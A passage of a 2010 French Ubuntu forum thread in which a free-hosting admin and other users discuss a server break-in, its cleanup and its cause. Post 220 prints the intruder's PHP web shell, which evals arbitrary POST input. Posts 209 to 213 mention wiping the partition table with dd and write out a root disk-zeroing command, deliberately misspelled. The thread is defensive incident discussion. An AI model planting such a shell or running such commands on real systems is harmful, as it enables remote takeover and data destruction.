#201 Le 05/09/2010, à 14:40
- pef
Re : Votre avis sur LegTux svp
En effet, c'est reparti pour un tour...
C'est tout de même étrange... Est-ce que c'est possible de détruire une partition et toute la table de partitions alors que le système tourne et qu'aucun accès SSH n'est possible ?
-As-tu réinstallé un OS depuis une source fiable ? (support d'installation officiel)
-As-tu restauré des mots de passe identiques à n'importe quel niveau ? (bdd, système, mail, ...)
-As-tu restauré des données exécutables ? (scripts shell, php, ...)
Si oui, l'intru a sûrement mis une porte dérobée facilement réactivable une fois le système restauréet là, à part restaurer des données datant d'avant l'intrusion, tu te ballade avec ses failles en gré de tes restaurations.
Hors ligne
#202 Le 05/09/2010, à 15:12
- ubuntlin
Re : Votre avis sur LegTux svp
Je vois qu'on a pas encore fini avec ces problèmes
Je vois qu'il y a eu un soucis au niveau des partitions, c'est pas si banale que ça
Mais je suis sûr que tout va se remettre à la normal
Koobecaf: http://koobecaf.fr
Le mot pour la frime: http://lemotpourlafri.me
Mon site web : http://ardoisestactiles.legtux.org
Hors ligne
#203 Le 05/09/2010, à 19:36
- LegSim
Re : Votre avis sur LegTux svp
J'avais restauré tous les binaires depuis une Debian propre.
Les mots de passe avaient TOUS été changés.
La table de partitions était détruite. C'est faisable depuis un système monté ça O_o ?
J'ai réussi à refaire venir les données. Évidemment, plus de logs. Plus de données utilisateur non plus (mais j'ai un backup de juste avant le crash).
Un seul truc qui avait changé : un .tar.gz des sources qui était créé dans le /var/www/legtux.org, il n'y était pas avant.
Le mec est un type connaisseur, je pense...
L'ouverture d'esprit ne se limite pas forcement à une fracture du crâne...
Ici, hébergement, adresses e-mail et jabber et upload de fichiers sur serveur libre, le tout à prix libre.
Hors ligne
#204 Le 05/09/2010, à 19:39
- xapantu
Re : Votre avis sur LegTux svp
Un seul truc qui avait changé : un .tar.gz des sources qui était créé dans le /var/www/legtux.org, il n'y était pas avant.
Le tar.gz est apparu après ce piratage ? Faudrait faire un diff avec la version actuel, à tous hasards...
Hors ligne
#205 Le 05/09/2010, à 19:56
- LegSim
Re : Votre avis sur LegTux svp
Après oui, aucune différence avec l'actuel.
L'ouverture d'esprit ne se limite pas forcement à une fracture du crâne...
Ici, hébergement, adresses e-mail et jabber et upload de fichiers sur serveur libre, le tout à prix libre.
Hors ligne
#206 Le 05/09/2010, à 19:59
- xapantu
Re : Votre avis sur LegTux svp
Après oui, aucune différence avec l'actuel.
Oo ? Bizarre...
Hors ligne
#207 Le 05/09/2010, à 20:17
- samυncle
Re : Votre avis sur LegTux svp
Je viens de lire c'est dommage ce qui t'es arrivé . En tout cas si je peux te donner un conseil, laisse les sources ouvertes (c'est plus sécurisé) et si une personne trouve une faille elle pourra te le dire (oui il y a des gens honnete qui quand ils trouvent une faille ils préviennent)
Hello world
Hors ligne
#208 Le 05/09/2010, à 20:51
- LegSim
Re : Votre avis sur LegTux svp
Serveur réparé.
On m'a parlé d'une faille dans le open_basedir de PHP qui permettait de passer outre cette directive. Mais comme le full disclosure est interdit, il ne pouvait pas me donner un exemple de code l'exploitant.
Donc, si cette faille existe vraiment, on peut créer un fichier qui peut-être exécuté par le site LegTux, donc avec la commande exec et sudo pour les droits root. Il faut donc que je limite les commandes que peut exécuter le site, pour éviter ce genre de trucs.
J'ai rétabli les services mails et Jabber. Je vais essayer de n'autoriser que les commandes qui sont strictement utiles au bon fonctionnement du serveur par sudo.
Mais personne n'a répondu à ma question : c'est possible de détruire une partition et la table de partoche depuis le système monté ?
L'ouverture d'esprit ne se limite pas forcement à une fracture du crâne...
Ici, hébergement, adresses e-mail et jabber et upload de fichiers sur serveur libre, le tout à prix libre.
Hors ligne
#209 Le 05/09/2010, à 20:59
- compte supprimé
Re : Votre avis sur LegTux svp
AMA, tu peux facilement flinguer le MBR ou une partition avec la commande dd, même depuis un système monté.
#210 Le 05/09/2010, à 23:48
- rmy
Re : Votre avis sur LegTux svp
je confirme. J'essaierai un peu plus tard, mais je ne vois pas ce qui poserait problème...
récupération de données: vrac–topic unique–mon site pro pour les particuliers : www.diskcard.fr– Je recycle volontiers tous vos disques durs HS (ou pas).
Le site pro pour les pros, spécialiste recupération de données RAID, NAS et serveurs: www.vodata.fr
Hors ligne
#211 Le 05/09/2010, à 23:58
- pef
Re : Votre avis sur LegTux svp
Serveur réparé.
On m'a parlé d'une faille dans le open_basedir de PHP qui permettait de passer outre cette directive. Mais comme le full disclosure est interdit, il ne pouvait pas me donner un exemple de code l'exploitant.
Donc, si cette faille existe vraiment, on peut créer un fichier qui peut-être exécuté par le site LegTux, donc avec la commande exec et sudo pour les droits root. Il faut donc que je limite les commandes que peut exécuter le site, pour éviter ce genre de trucs.J'ai rétabli les services mails et Jabber. Je vais essayer de n'autoriser que les commandes qui sont strictement utiles au bon fonctionnement du serveur par sudo.
Mais personne n'a répondu à ma question : c'est possible de détruire une partition et la table de partoche depuis le système monté ?
Je pense qu'il faut plus te pencher sur une faille de ton code plutôt que de php.
Et il est possible de détruire n'importe quoi en root (cat /dave/zero > /dev/hda, et voilà, plus rien)
Hors ligne
#212 Le 06/09/2010, à 00:00
- kamui57
Re : Votre avis sur LegTux svp
Et il est possible de détruire n'importe quoi en root (cat /dave/zero > /dev/hda, et voilà, plus rien)
Dave serait content (ouais je sais la situation n'est pas drôle, mais j'adore la commande)
Quand le dernier arbre aura été abattu, et le dernier animal exterminé, les hommes se rendront compte que l'argent ne se mange pas (proverbe indien)
Toshiba Satellite L655 4 Go RAM, Archlinux Gnome-shell,LXDE / W7
Toshiba Satellite M30 512 Mo RAM, Archlinux Gnome 3 restreint / Crunchbang LXDE
https://help.ubuntu.com/community/Pastebinit pour poster du texte sur internet en console
Hors ligne
#213 Le 06/09/2010, à 00:06
- pef
Re : Votre avis sur LegTux svp
Et il est possible de détruire n'importe quoi en root (cat /dave/zero > /dev/hda, et voilà, plus rien)
Dave serait content (ouais je sais la situation n'est pas drôle, mais j'adore la commande)
pour éviter les copier/coller malencontreux
Hors ligne
#214 Le 06/09/2010, à 00:09
- kamui57
Re : Votre avis sur LegTux svp
Ah ok, bonne idée J'essaierai d'y penser si un jour je dois écrire un truc du genre
Quand le dernier arbre aura été abattu, et le dernier animal exterminé, les hommes se rendront compte que l'argent ne se mange pas (proverbe indien)
Toshiba Satellite L655 4 Go RAM, Archlinux Gnome-shell,LXDE / W7
Toshiba Satellite M30 512 Mo RAM, Archlinux Gnome 3 restreint / Crunchbang LXDE
https://help.ubuntu.com/community/Pastebinit pour poster du texte sur internet en console
Hors ligne
#215 Le 06/09/2010, à 21:26
- LegSim
Re : Votre avis sur LegTux svp
C'est en cours de sécurisation...
Je fais tout mon possible et je contacte des gens doués là-dedans.
Réouverture Mercredi je pense.
L'ouverture d'esprit ne se limite pas forcement à une fracture du crâne...
Ici, hébergement, adresses e-mail et jabber et upload de fichiers sur serveur libre, le tout à prix libre.
Hors ligne
#216 Le 06/09/2010, à 22:56
- LegSim
Re : Votre avis sur LegTux svp
Génial !
J'ai trouvé les traces de l'intrusion : ça venait du service upload, dans lequel le pirate a envoyé un fichier avec ses superbes commandes.
Ensuite il a contourné mes protections de l'include pour faire exécuter ça par le site normal. Fallait trouver, c'était une faille bien spécifique.
J'ai le fichier .php qu'il a créé pour faire ça !
Donc je réouvre tranquillement, si vous voyez des bugs, tell me !
L'ouverture d'esprit ne se limite pas forcement à une fracture du crâne...
Ici, hébergement, adresses e-mail et jabber et upload de fichiers sur serveur libre, le tout à prix libre.
Hors ligne
#217 Le 06/09/2010, à 23:03
- Sir Na Kraïou
Re : Votre avis sur LegTux svp
C'est cool ! T'as des logs ou un moyen quelconque de savoir qui a fait ça ?
Dernière modification par Р☢w ! ✰ :mad: ✰ (эй !) (Le 06/09/2010, à 23:03)
Descendant de Charlemagne et de LUCA.
Bleu, en l'hommage d'un truc bleu. :'(
C'est pas du bleu.
C'est pas le lac de Genève, c'est le Lac Léman.
Hors ligne
#218 Le 06/09/2010, à 23:04
- LegSim
Re : Votre avis sur LegTux svp
Il a agit en deux temps :
Il a d'abord utilisé son compte pour faire un premier accès discret, dans lequel il a trifouillé les fichiers sessions pour se connecter en tant qu'un autre compte, duquel il a envoyé le fichier explosif.
L'ouverture d'esprit ne se limite pas forcement à une fracture du crâne...
Ici, hébergement, adresses e-mail et jabber et upload de fichiers sur serveur libre, le tout à prix libre.
Hors ligne
#219 Le 06/09/2010, à 23:05
- helly
Re : Votre avis sur LegTux svp
Hourra !
Archlinux-wmii-dwb.
Un problème résolu ? Faites le savoir en mettant [résolu] à côté du titre de votre topic.
Un problème non résolu ? Faites le savoir en insultant ceux qui cherchent à vous aider.
Un site bleu super remasterised©, un wiki cherchant des volontaires pour traduire un site.
Hors ligne
#220 Le 06/09/2010, à 23:14
- LegSim
Re : Votre avis sur LegTux svp
Voici le script qui a été utilisé :
<form method="POST" action="?<?php echo $_SERVER["QUERY_STRING"]; ?>">
<textarea name="message"></textarea>
<input type="submit">
</form>
<?php
var_dump($_POST);
error_reporting(0);
echo eval(stripslashes($_POST['message']));
?>
L'ouverture d'esprit ne se limite pas forcement à une fracture du crâne...
Ici, hébergement, adresses e-mail et jabber et upload de fichiers sur serveur libre, le tout à prix libre.
Hors ligne
#221 Le 07/09/2010, à 10:11
- tatsu-chan
Re : Votre avis sur LegTux svp
Il a agit en deux temps :
Il a d'abord utilisé son compte pour faire un premier accès discret, dans lequel il a trifouillé les fichiers sessions pour se connecter en tant qu'un autre compte, duquel il a envoyé le fichier explosif.
Ça veut donc dire que tu sais qui a fait ça ?
Hors ligne
#222 Le 07/09/2010, à 10:29
- LegSim
Re : Votre avis sur LegTux svp
Non, le compte en question a été supprimé après avoir modifié les sessions pour se faire reconnaitre comme un autre compte.
L'ouverture d'esprit ne se limite pas forcement à une fracture du crâne...
Ici, hébergement, adresses e-mail et jabber et upload de fichiers sur serveur libre, le tout à prix libre.
Hors ligne
#223 Le 07/09/2010, à 10:58
- rmy
Re : Votre avis sur LegTux svp
tu n'a pas un log de créations/supressions de comptes ?
récupération de données: vrac–topic unique–mon site pro pour les particuliers : www.diskcard.fr– Je recycle volontiers tous vos disques durs HS (ou pas).
Le site pro pour les pros, spécialiste recupération de données RAID, NAS et serveurs: www.vodata.fr
Hors ligne
#224 Le 07/09/2010, à 11:02
- LegSim
Re : Votre avis sur LegTux svp
Non, c'est vrai que ça manque.
L'ouverture d'esprit ne se limite pas forcement à une fracture du crâne...
Ici, hébergement, adresses e-mail et jabber et upload de fichiers sur serveur libre, le tout à prix libre.
Hors ligne
#225 Le 07/09/2010, à 11:28
- tatsu-chan
Re : Votre avis sur LegTux svp
Et tu n'as pas une liste des comptes créés avant le hack et une liste des comptes après le hack ? Ainsi, par déduction, on pourrait retrouver le pirate, ou à défaut des suspects.
Hors ligne